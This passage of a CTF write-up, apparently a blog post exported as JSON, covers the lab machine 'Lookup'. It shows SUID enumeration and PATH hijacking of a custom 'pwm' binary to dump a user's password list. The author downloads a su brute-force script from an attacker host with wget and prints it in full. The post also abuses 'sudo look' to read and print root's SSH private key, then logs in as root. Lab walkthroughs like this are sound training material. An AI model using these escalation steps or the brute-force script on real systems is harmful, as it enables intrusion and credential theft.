.profile\ndrw-r----- 2 think think 4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -&gt; \/dev\/null\n-rw-r----- 1 root  think   33 Jul 30  2023 user.txt\n(remote) www-data@lookup:\/home\/think$ sudo -l\n[sudo] password for www-data: \n^C\n(remote) www-data@lookup:\/tmp$ find \/ -perm -u=s -type 
f 2&gt;\/dev\/null\n\/snap\/snapd\/19457\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1950\/usr\/bin\/chfn\n\/snap\/core20\/1950\/usr\/bin\/chsh\n\/snap\/core20\/1950\/usr\/bin\/gpasswd\n\/snap\/core20\/1950\/usr\/bin\/mount\n\/snap\/core20\/1950\/usr\/bin\/newgrp\n\/snap\/core20\/1950\/usr\/bin\/passwd\n\/snap\/core20\/1950\/usr\/bin\/su\n\/snap\/core20\/1950\/usr\/bin\/sudo\n\/snap\/core20\/1950\/usr\/bin\/umount\n\/snap\/core20\/1950\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1950\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pwm\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n(remote) www-data@lookup:\/tmp$ ls -la \/usr\/sbin\/pwm\n-rwsr-sr-x 1 root root 17176 Jan 11  2024 \/usr\/sbin\/pwm<\/code><\/pre>\n<p>Run pspy to take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906962.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906962.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923181408964\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then upload <code>linpeas.sh<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906963.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906963.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923182027443\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/tmp$ find \/ -group think -type f 2&gt;\/dev\/null\n\/home\/think\/.cache\/motd.legal-displayed\n\/home\/think\/.profile\n\/home\/think\/.bashrc\n\/home\/think\/.passwords\n\/home\/think\/.bash_logout\n\/home\/think\/user.txt\n\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/snap\/core20\/1950\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1974\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/bin\/ping = 
cap_net_raw+ep\n\n(remote) www-data@lookup:\/$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n[!] ID: www-data\n[-] File \/home\/www-data\/.passwords not found<\/code><\/pre>\n<h3>Privilege Escalation via Environment Variable Hijacking<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/home$ whereis id\nid: \/usr\/bin\/id \/usr\/share\/man\/man1\/id.1.gz\n(remote) www-data@lookup:\/home$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n(remote) www-data@lookup:\/home$ cd \/tmp\n(remote) www-data@lookup:\/tmp$ id      \nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@lookup:\/tmp$ id think \nuid=1000(think) gid=1000(think) groups=1000(think)\n(remote) www-data@lookup:\/tmp$ echo &#039;1000&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ chmod +x id\n(remote) www-data@lookup:\/tmp$ PATH=$PWD:$PATH\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: 1000: not found\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ echo &#039;uid=1000(think)&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: Syntax error: &quot;(&quot; unexpected\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ cat id\nuid=1000(think)\n(remote) www-data@lookup:\/tmp$ echo &#039;uid=1000(think) gid=1000(think) groups=1000(think)&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] 
Running &#039;id&#039; command to extract the username and user ID (UID)\n\/tmp\/id: 1: Syntax error: &quot;(&quot; unexpected\n[-] Error reading username from id command\n: Success\n(remote) www-data@lookup:\/tmp$ id           \n\/tmp\/id: line 1: syntax error near unexpected token `(&#039;\n\/tmp\/id: line 1: `uid=1000(think) gid=1000(think) groups=1000(think)&#039;\n(remote) www-data@lookup:\/tmp$ echo &#039;echo &quot;uid=1000(think) gid=1000(think) groups=1000(think)&quot;&#039; &gt; id\n(remote) www-data@lookup:\/tmp$ id\nuid=1000(think) gid=1000(think) groups=1000(think)\n(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm\n[!] Running &#039;id&#039; command to extract the username and user ID (UID)\n[!] ID: think\njose1006\njose1004\njose1002\njose1001teles\njose100190\njose10001\njose10.asd\njose10+\njose0_07\njose0990\njose0986$\njose098130443\njose0981\njose0924\njose0923\njose0921\nthepassword\njose(1993)\njose&#039;sbabygurl\njose&amp;vane\njose&amp;takie\njose&amp;samantha\njose&amp;pam\njose&amp;jlo\njose&amp;jessica\njose&amp;jessi\njosemario.AKA(think)\njose.medina.\njose.mar\njose.luis.24.oct\njose.line\njose.leonardo100\njose.leas.30\njose.ivan\njose.i22\njose.hm\njose.hater\njose.fa\njose.f\njose.dont\njose.d\njose.com}\njose.com\njose.chepe_06\njose.a91\njose.a\njose.96.\njose.9298\njose.2856171<\/code><\/pre>\n<p>Try these passwords in a brute-force attempt to escalate privileges:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/tmp$ \/usr\/sbin\/pwm &gt; pass.txt\n(remote) www-data@lookup:\/tmp$ wget http:\/\/192.168.10.102:8888\/suBF.sh\n(remote) www-data@lookup:\/tmp$ chmod +x suBF.sh \n(remote) www-data@lookup:\/tmp$ cat suBF.sh \n#!\/bin\/bash\n\nhelp=&quot;This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).\nYou can specify a username using -u &lt;username&gt; and a wordlist via -w &lt;wordlist&gt;.\nBy default the BF 
default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete\nYou can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).\nFastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete\n\nExample:    .\/suBF.sh -u &lt;USERNAME&gt; [-w top12000.txt] [-t 0.7] [-s 0.007]\n\nTHE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL\\n\\n&quot;\n\nWORDLIST=&quot;top12000.txt&quot;\nUSER=&quot;&quot;\nTIMEOUTPROC=&quot;0.7&quot;\nSLEEPPROC=&quot;0.007&quot;\nwhile getopts &quot;h?u:t:s:w:&quot; opt; do\n  case &quot;$opt&quot; in\n    h|\\?) printf &quot;$help&quot;; exit 0;;\n    u)  USER=$OPTARG;;\n    t)  TIMEOUTPROC=$OPTARG;;\n    s)  SLEEPPROC=$OPTARG;;\n    w)  WORDLIST=$OPTARG;;\n    esac\ndone\n\nif ! [ &quot;$USER&quot; ]; then printf &quot;$help&quot;; exit 0; fi\n\nif ! [[ -p \/dev\/stdin ]] &amp;&amp; ! [ $WORDLIST = &quot;-&quot; ] &amp;&amp; ! [ -f &quot;$WORDLIST&quot; ]; then echo &quot;Wordlist ($WORDLIST) not found!&quot;; exit 0; fi\n\nC=$(printf &#039;\\033&#039;)\n\nsu_try_pwd (){\n  USER=$1\n  PASSWORDTRY=$2\n  trysu=`echo &quot;$PASSWORDTRY&quot; | timeout $TIMEOUTPROC su $USER -c whoami 2&gt;\/dev\/null` \n  if [ &quot;$trysu&quot; ]; then\n    echo &quot;  You can login as $USER using password: $PASSWORDTRY&quot; | sed &quot;s,.*,${C}[1;31;103m&amp;${C}[0m,&quot;\n    exit 0;\n  fi\n}\n\nsu_brute_user_num (){\n  echo &quot;  [+] Bruteforcing $1...&quot;\n  USER=$1\n  su_try_pwd $USER &quot;&quot; &amp;    #Try without password\n  su_try_pwd $USER $USER &amp; #Try username as password\n  su_try_pwd $USER `echo $USER | rev 2&gt;\/dev\/null` &amp;     #Try reverse username as password\n\n  if ! 
[[ -p \/dev\/stdin ]] &amp;&amp; [ -f &quot;$WORDLIST&quot; ]; then\n    while IFS=&#039;&#039; read -r P || [ -n &quot;${P}&quot; ]; do # Loop through wordlist file   \n      su_try_pwd $USER $P &amp; #Try TOP TRIES of passwords (by default 2000)\n      sleep $SLEEPPROC # To not overload the system\n    done &lt; $WORDLIST\n\n  else\n    cat - | while read line; do\n      su_try_pwd $USER $line &amp; #Try TOP TRIES of passwords (by default 2000)    \n      sleep $SLEEPPROC # To not overload the system\n    done\n  fi\n  wait\n}\n\nsu_brute_user_num $USER\necho &quot;  Wordlist exhausted&quot; | sed &quot;s,.*,${C}[1;31;107m&amp;${C}[0m,&quot;\n(remote) www-data@lookup:\/tmp$ .\/suBF.sh -u think -w pass.txt \n  [+] Bruteforcing think...\n  You can login as think using password: josemario.AKA(think)\n  Wordlist exhausted<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906964.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906964.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923190246582\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Escalating to root with look<\/h3>\n<pre><code class=\"language-bash\">think@lookup:~$ ls -la\ntotal 40\ndrwxr-xr-x 5 think think 4096 Jan 11  2024 .\ndrwxr-xr-x 3 root  root  4096 Jun  2  2023 ..\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout\n-rwxr-xr-x 1 think think 3771 Jun  2  2023 
.bashrc\ndrwxr-xr-x 2 think think 4096 Jun 21  2023 .cache\ndrwx------ 3 think think 4096 Aug  9  2023 .gnupg\n-rw-r----- 1 root  think  525 Jul 30  2023 .passwords\n-rwxr-xr-x 1 think think  807 Jun  2  2023 .profile\ndrw-r----- 2 think think 4096 Jun 21  2023 .ssh\n-rw-r----- 1 root  think   33 Jul 30  2023 user.txt\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -&gt; \/dev\/null\nthink@lookup:~$ cat .passwords \njose1006\njose1004\njose1002\njose1001teles\njose100190\njose10001\njose10.asd\njose10+\njose0_07\njose0990\njose0986$\njose098130443\njose0981\njose0924\njose0923\njose0921\nthepassword\njose(1993)\njose&#039;sbabygurl\njose&amp;vane\njose&amp;takie\njose&amp;samantha\njose&amp;pam\njose&amp;jlo\njose&amp;jessica\njose&amp;jessi\njosemario.AKA(think)\njose.medina.\njose.mar\njose.luis.24.oct\njose.line\njose.leonardo100\njose.leas.30\njose.ivan\njose.i22\njose.hm\njose.hater\njose.fa\njose.f\njose.dont\njose.d\njose.com}\njose.com\njose.chepe_06\njose.a91\njose.a\njose.96.\njose.9298\njose.2856171\nthink@lookup:~$ cat user.txt \n38375fb4dd8baa2b2039ac03d92b820e\nthink@lookup:~$ sudo -l\n[sudo] password for think: \nMatching Defaults entries for think on lookup:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser think may run the following commands on lookup:\n    (ALL) \/usr\/bin\/look\nthink@lookup:~$ \/usr\/bin\/look\nusage: look [-bdf] [-t char] string [file ...]\nthink@lookup:~$ sudo look &#039;&#039; &quot;\/root\/.ssh\/id_rsa&quot;\n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf\/h23TCH7qKRg4Penlti9RKW2XLSB5wR\nQcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM\/zDb\/\/ZlnlwCwKQ5XyTQU\/vHfROfU0pnR\nj7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR\/+ybAIVbB+ya\/D5r9DYPmatUTLlHD\nbV55xi6YcfV7rjbOpjRj8hgubYgjL26BwszbaHKSkI+NcVNPmgquy5Xw8gh3XciFhNLqmd\nISF9fxn5i1vQDB318owoPPZB1rIuMPH3C0SIno42FiqFO\/fb1\/wPHGasBmLzZF6Fr8\/EHC\n4wRj9tqsMZfD8xkk2FACtmAFH90ZHXg5D+pwujPDQAuULODP8Koj4vaMKu2CgH3+8I3xRM\nhufqHa1+Qe3Hu++7qISEWFHgzpRMFtjPFJEGRzzh2x8F+wozctvn3tcHRv321W5WJGgzhd\nk5ECnuu8Jzpg25PEPKrvYf+lMUQebQSncpcrffr9AAAFiJB\/j92Qf4\/dAAAAB3NzaC1yc2\nEAAAGBAKbZtvg4qVX1DGPu4PS3Jn\/4dt0wh+6ikYOD3p5bYvUSltly0gecEUHKstc0RQyr\nUUBoX06vmH1X26CQTwnyh3aUKjP8w2\/\/2ZZ5cAsCkOV8k0FP7x30Tn1NKZ0Y+3iKcOdCez\nxjzRu0QIGz+bSdjXLBWAIn5sTKyT1Uf\/smwCFWwfsmvw+a\/Q2D5mrVEy5Rw21eecYumHH1\ne642zqY0Y\/IYLm2IIy9ugcLM22hykpCPjXFTT5oKrsuV8PIId13IhYTS6pnSEhfX8Z+Ytb\n0Awd9fKMKDz2QdayLjDx9wtEiJ6ONhYqhTv329f8DxxmrAZi82Reha\/PxBwuMEY\/barDGX\nw\/MZJNhQArZgBR\/dGR14OQ\/qcLozw0ALlCzgz\/CqI+L2jCrtgoB9\/vCN8UTIbn6h2tfkHt\nx7vvu6iEhFhR4M6UTBbYzxSRBkc84dsfBfsKM3Lb597XB0b99tVuViRoM4XZORAp7rvCc6\nYNuTxDyq72H\/pTFEHm0Ep3KXK336\/QAAAAMBAAEAAAGBAJ4t2wO6G\/eMyIFZL1Vw6QP7Vx\nzdbJE0+AUZmIzCkK9MP0zJSQrDz6xy8VeKi0e2huIr0Oc1G7kA+QtgpD4G+pvVXalJoTLl\n+K9qU2lstleJ4cTSdhwMx\/iMlb4EuCsP\/HeSFGktKH9yRJFyQXIUx8uaNshcca\/xnBUTrf\n05QH6a1G44znuJ8QvGF0UC2htYkpB2N7ZF6GppUybXeNQi6PnUKPfYT5shBc3bDssXi5GX\nNn3QgK\/GHu6NKQ8cLaXwefRUD6NBOERQtwTwQtQN+n\/xIs77kmvCyYOxzyzgWoS2zkhXUz\nYZyzk8d2PahjPmWcGW3j3AU3A3ncHd7ga8K9zdyoyp6nCF+VF96DpZSpS2Oca3T8yltaR1\n1fkofhBy75ijNQTXUHhAwuDaN5\/zGfO+HS6iQ1YWYiXVZzPsktV4kFpKkUMklC9VjlFjPi\nt1zMCGVDXu2qgfoxwsxRwknKUt75osVPN9HNAU3LVqviencqvNkyPX9WXpb+z7GUf7FQAA\nAMEAytl5PGb1fSnUYB2Q+GKyEk\/SGmRdzV07LiF9FgHMCsEJEenk6rArffc2FaltHYQ\/Hz\nw\/GnQakUjYQTNnUIUqcxC59SvbfAKf6nbpYHzjmWxXnOvkoJ7cYZ\/sYo5y2Ynt2QcjeFxn\nvD9I8ACJBVQ8LYUffvuQUHYTTkQO1TnptZeWX7IQml0SgvucgXdLekMNu6aqIh71AoZYCj\nrirB3Y5j
jhhzwgIK7GNQ7oUe9GsErmZjD4c4KueznC5r+tQXu3AAAAwQDWGTkRzOeKRxE\/\nC6vFoWfAj3PbqlUmS6clPOYg3Mi3PTf3HyooQiSC2T7pK82NBDUQjicTSsZcvVK38vKm06\nK6fle+0TgQyUjQWJjJCdHwhqph\/\/UKYoycotdP+nBin4x988i1W3lPXzP3vNdFEn5nXd10\n5qIRkVl1JvJEvrjOd+0N2yYpQOE3Qura055oA59h7u+PnptyCh5Y8g7O+yfLdw3TzZlR5T\nDJC9mqI25np\/PtAKNBEuDGDGmOnzdU47sAAADBAMeBRAhIS+rM\/ZuxZL54t\/YL3UwEuQis\nsJP2G3w1YK7270zGWmm1LlbavbIX4k0u\/V1VIjZnWWimncpl+Lhj8qeqwdoAsCv1IHjfVF\ndhIPjNOOghtbrg0vvARsMSX5FEgJxlo\/FTw54p7OmkKMDJREctLQTJC0jRRRXhEpxw51cL\n3qXILoUzSmRum2r6eTHXVZbbX2NCBj7uH2PUgpzso9m7qdf7nb7BKkR585f4pUuI01pUD0\nDgTNYOtefYf4OEpwAAABFyb290QHVidW50dXNlcnZlcg==\n-----END OPENSSH PRIVATE KEY-----\nthink@lookup:~$ sudo look &#039;&#039; &quot;\/root\/.ssh\/id_rsa&quot; &gt; \/tmp\/root;chmod 600 \/tmp\/root\nthink@lookup:~$ ssh 0.0.0.0 -i \/tmp\/root\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:hCU4CBHGs0axyMgyDsZBy1GHRljqponOxB4rQDOUOzA.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nFailed to add the host to the list of known hosts (\/home\/think\/.ssh\/known_hosts).\nthink@0.0.0.0&#039;s password: \n\nthink@lookup:~$ ssh root@0.0.0.0 -i \/tmp\/root\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:hCU4CBHGs0axyMgyDsZBy1GHRljqponOxB4rQDOUOzA.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nFailed to add the host to the list of known hosts (\/home\/think\/.ssh\/known_hosts).\nWelcome to Ubuntu 20.04.6 LTS (GNU\/Linux 5.4.0-156-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Mon 23 Sep 2024 11:04:45 AM UTC\n\n  System load:              0.03\n  Usage of \/:               62.5% of 9.75GB\n  Memory usage:             43%\n  Swap usage:               0%\n  Processes:                211\n  Users logged in:          0\n  IPv4 address for enp0s17: 192.168.10.101\n  IPv6 address for enp0s17: fd00:4c10:d50a:f900:a00:27ff:fefd:3131\n\n  =&gt; There are 2 zombie processes.\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n\n7 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Wed Sep 11 09:24:50 2024\nroot@lookup:~$ <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906965.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906965.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923190600859\" style=\"zoom: 50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lookup Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-814","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=814"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814\/revisions"}],"predecessor-version":[{"id":815,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/814\/revisions\/815"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=814"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}